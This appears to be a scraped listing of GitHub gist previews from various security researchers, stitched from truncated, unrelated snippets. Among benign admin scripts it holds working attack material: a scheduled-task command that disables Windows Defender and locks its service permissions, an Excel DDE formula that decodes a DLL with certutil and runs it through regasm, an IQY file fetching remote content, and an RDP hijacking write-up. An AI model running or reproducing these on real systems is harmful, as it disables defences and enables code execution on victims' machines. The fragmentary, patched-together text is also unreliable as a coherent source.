Trenly

This powershell script modifies the Base Image, or the Virtual Hard Disk, which the Windows Sandbox launches upon startup. It will copy the required files to the sandbox and add a registry key which will install them upon startup. By default the script will install the latest stable release of Winget. You can specify to use the latest pre-release with the -PreRelease switch.

When a new version of Winget is released, run this script again to update the installation in the sandbox to the latest version

vikas891

#Usage:
#
#NOTE: The script expects an argument which is the full File Path of the EVTX file.  
#
#C:\>ExtractAllScripts.ps1  
#The default behavior of the script is to assimilate and extract every script/command to disk.
#
#C:\ExtractAllScripts -List
#This will only list Script Block IDs with associated Script Names(if logged.)
#

tyranid

$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')

cetaSYN

#!/usr/bin/env python3

__author__ = 'cetaSYN'

import argparse
import queue
import signal
import socket
import sys
import threading

kmcquade

• chime:CreateApiKey
• codepipeline:PollForJobs
• cognito-identity:GetOpenIdToken
• cognito-identity:GetOpenIdTokenForDeveloperIdentity
• cognito-identity:GetCredentialsForIdentity
• connect:GetFederationToken
• connect:GetFederationTokens
• ecr:GetAuthorizationToken
• [gamelift:RequestUploadCredentials](ht

Mr-Un1k0d3r

=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'

Mr-Un1k0d3r

WEB
1
https://ringzer0team.com/IQY

Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False

bohops

RDP Eavesdropping and Hijacking
*******************************
I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions.  Here is a gist of (semi) interesting findings
that is not very new...

===========
Inspiration
===========
As you may already know...

cryptolok

#!/bin/bash

# this tool will automate firmware extraction and unpacking using FT232R-type adaptors (like BusPirate) and a SOIC clip placed on a chip to dump
# install the necessary software:
#$ sudo apt install flashrom binwalk || echo 'git clone?'
# pump up binwalk with additional packages and libraries
#$ bash <(curl -s https://raw.githubusercontent.com/devttys0/binwalk/master/deps.sh)
# place the clip on the chip, connect it to the adaptor, which sould be connected to your PC (with drivers installed) and launch the script:
# chip => clip => adaptor => PC => script

api0cradle

accesschk -w -s -u Users "C:\Program Files" >> programfiles.txt
accesschk -w -s -u Everyone "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Authenticated Users" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u Interactive "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "This Organization" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Authentication authority asserted identity" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Mandatory Label\Medium Mandatory Level" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u %username% "C:\Program Files" >> programfiles.txt

accesschk -w -s -u Users "C:\Program Files (x86)" >> programfilesx86.txt